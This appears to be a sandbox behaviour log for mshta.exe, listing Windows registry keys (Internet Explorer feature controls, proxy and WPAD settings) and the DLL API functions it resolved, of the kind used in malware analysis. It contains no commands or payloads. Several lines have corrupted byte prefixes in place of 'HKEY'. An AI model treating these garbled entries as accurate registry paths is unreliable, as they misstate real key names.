HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESansSerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEUIFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\IE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\VML
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\WindowsEdition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/xml\CLSID
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
\xede8\x9cEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
\x8e08]EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
\x8e08]EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
\xe018]EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
\xe018]EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnforceP3PValidity
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
\x8e08]EY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
\x8e08]EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\*
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableUTF8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Control Panel\UTF8URLQuery
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\EnableAnchorContext
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{332C4425-26CB-11D0-B483-00C04FD90119}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Linkage\Export
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ClientCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DriverCompat\Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DriverCompat\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\Drivers\Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\Drivers\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DX6TextureEnumInclusionList\Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DX6TextureEnumInclusionList\Name
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\OperationalData
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\*
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PrefetchPrerender\Enabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadNetworkName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
ntdll.dll.RtlDllShutdownInProgress
comctl32.dll.#329
linkinfo.dll.IsValidLinkInfo
propsys.dll.#407
propsys.dll.PropVariantToGUID
propsys.dll.PSGetNameFromPropertyKey
propsys.dll.PSStringFromPropertyKey
propsys.dll.InitVariantFromBuffer
oleaut32.dll.#9
propsys.dll.PSLookupPropertyHandlerCLSID
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryValueExW
advapi32.dll.RegCloseKey
propsys.dll.PSCreatePropertyStoreFromObject
oleaut32.dll.#6
propsys.dll.PropVariantToStringAlloc
ole32.dll.CoTaskMemRealloc
ole32.dll.CLSIDFromString
comctl32.dll.#388
comctl32.dll.#321
shell32.dll.#66
ole32.dll.CoGetMalloc
ole32.dll.CoAllowSetForegroundWindow
ole32.dll.CoCreateInstance
secur32.dll.GetUserNameExW
api-ms-win-downlevel-shlwapi-l1-1-0.dll.PathCreateFromUrlW
shell32.dll.SHGetFolderPathW
api-ms-win-downlevel-advapi32-l2-1-0.dll.ConvertStringSidToSidW
advapi32.dll.SaferGetPolicyInformation
sfc.dll.SfcIsFileProtected
ole32.dll.OleUninitialize
ole32.dll.CoRevokeInitializeSpy
cryptsp.dll.CryptReleaseContext
kernelbase.dll.SetThreadStackGuarantee
api-ms-win-downlevel-advapi32-l1-1-0.dll.UnregisterTraceGuids
oleaut32.dll.#500
cryptbase.dll.SystemFunction036
kernel32.dll.HeapSetInformation
kernel32.dll.RegisterApplicationRestart
mshtml.dll.RunHTMLApplication
ole32.dll.OleInitialize
shlwapi.dll.PathRemoveArgsW
urlmon.dll.CreateURLMonikerEx
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
api-ms-win-downlevel-ole32-l1-1-0.dll.CoCreateInstance
api-ms-win-downlevel-ole32-l1-1-0.dll.CoInitializeEx
api-ms-win-downlevel-shlwapi-l2-1-0.dll.IUnknown_QueryService
shlwapi.dll.#29
api-ms-win-downlevel-ole32-l1-1-0.dll.CoTaskMemFree
oleaut32.dll.#4
oleaut32.dll.#7
urlmon.dll.#485
shell32.dll.SHCreateAssociationRegistration
api-ms-win-downlevel-advapi32-l1-1-0.dll.GetTokenInformation
secur32.dll.GetUserNameExA
api-ms-win-downlevel-advapi32-l1-1-0.dll.GetSidSubAuthorityCount
api-ms-win-downlevel-advapi32-l1-1-0.dll.GetSidSubAuthority
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCreateKeyExA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegQueryValueExA
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegOpenKeyExW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegGetValueW
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegCloseKey
shell32.dll.SHGetKnownFolderPath
api-ms-win-downlevel-advapi32-l1-1-0.dll.CopySid
api-ms-win-downlevel-advapi32-l2-1-0.dll.ConvertSidToStringSidW
api-ms-win-downlevel-advapi32-l2-1-0.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventRegister
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegGetValueA
iertutil.dll.#701
iertutil.dll.#703
iertutil.dll.#702
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegOpenKeyExA
api-ms-win-downlevel-ole32-l1-1-0.dll.CoTaskMemAlloc
ws2_32.dll.#115
ws2_32.dll.#111
iertutil.dll.#791
